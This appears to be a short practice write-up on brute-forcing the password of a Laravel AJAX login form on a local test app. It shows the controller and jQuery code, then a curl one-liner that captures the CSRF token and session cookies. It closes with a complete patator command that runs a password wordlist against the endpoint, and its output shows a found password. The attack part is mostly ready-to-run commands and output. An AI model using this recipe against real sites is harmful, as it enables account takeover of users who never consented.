Bruteforce laravel forms with has ajax login checks
Route
Route::post('/login/user', 'CustomLoginController@loginUser');
LoginController
public function loginUser(Request $request) { $email = $request->email; $password = $request->password; $rememberToken = $request->remember; // now we use the Auth to Authenticate the users Credentials // Attempt Login for members if (Auth::guard('member')->attempt(['email' => $email, 'password' => $password], $rememberToken)) { $msg = array( 'status' => 'success', 'message' => 'Login Successful' ); return response()->json($msg); } else { $msg = array( 'status' => 'error', 'message' => 'Login Fail !' ); return response()->json($msg); } }
We know well all the login comes with CSRF
Cookies = $(curl -s -c ajax.cookie "127.0.0.1:8000/login.php" | awk -F 'value=' '/_token/ {print $2}' | cut -d "'" -f2)
This file will generate a file file with session and CSRF, copy those and use with the python script
Javascript send data function LoginUser() { var token = $("input[name=_token]").val(); var email = $("input[name=email]").val(); var password = $("input[name=password]").val(); var data = { _token:token, email:email, password:password }; // Ajax Post $.ajax({ type: "post", url: "/login/user", data: data, cache: false, success: function (data) { console.log('login request sent !'); console.log('status: ' +data.status); console.log('message: ' +data.message); }, error: function (data){ alert('Fail to run Login..'); } }); return false; }
our html looks like this it has hidden input field sets the _token value which checks in Login Controller name="_token" value="HEmuStR1wyJ4GAvE4zVwQ9nq14ZZ0YGw5yWHncIp type="text" name="email" type="password" name="password" Finally our Require fields to bruteforce this login is 1 => _token 2 => email 3 => Password 4 => XSRF-TOKEN 5 => laravel_session BruteForce with patator now time patator http_fuzz method=POST url="http://127.0.0.1:8000/login/user" 0=/usr/share/wordlists/fasttrack.txt body="[email protected]&password=FILE0&_token=HEmuStR1wyJ4GAvE4zVwQ9nq14ZZ0YGw5yWHncIp" header="Cookie: XSRF-TOKEN=eyJpdiI6IkVwUGh4YmY4eFRqT2JEeFhjXC9xV2xnPT0iLCJ2YWx1ZSI6Ikh4cEhreGxHT1JBT3U1T2xQWE1kQ3VlZ3g3WldIWW04djFHSlRhamdCNWZLcWNaRVFiUXNCdnRoTjhKWWl6YStKa09lOWRkekJ3UkNEWk9ybEhheVNBPT0iLCJtYWMiOiI2NmI2ZWY2MDIwZTkyYTU3ZTczYWFiYWMwZTQwYTRmZDMwYTdlMjI0MzA0ZWRiM2RlN2VmMDU5NGE4ZWQ3N2U4In0%3D; laravel_session=eyJpdiI6Ilwvck9UQndqeHpnekVtYnp0THIwRlwvQT09IiwidmFsdWUiOiI4cFJYaXVzcFwvcVBpdW9BMTJ4cnVcL2FrUnhETUxMa2tiZ1Q0OEpYTzlDZzVSUm9KV0xSdVhrNFpLMVwvZWwxMjhKTVdKcHc0MTlBVzBcLzVxUkpKT0FaZHc9PSIsIm1hYyI6IjNlNWI4YWMzYWY1MTRhMjBhYTZjYmZmNjFjYTdjYjRjMzVjY2U2OGMyZDZhY2JjY2VkZTg2MzIxZmEyMjE0MjcifQ%3D%3D" -x ignore:fgrep=Fail accept_cookie=0 Result : 03:28:13 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.2 at 2021-12-23 03:28 IST 03:28:13 patator INFO - 03:28:13 patator INFO - code size:clen time | candidate | num | mesg 03:28:13 patator INFO - ----------------------------------------------------------------------------- 03:28:33 patator INFO - 200 1016:-1 0.838 | hello | 223 | HTTP/1.1 200 OK 03:28:33 patator INFO - Hits/Done/Skip/Fail/Size: 1/223/0/0/223, Avg: 11 r/s, Time: 0h 0m 20s real 0m21.449s user 0m1.595s sys 0m0.631s Source code for the laravel app https://github.com/topza1412/Laravel-ajax-login-register I cloned randomly and tested my skill !!!!..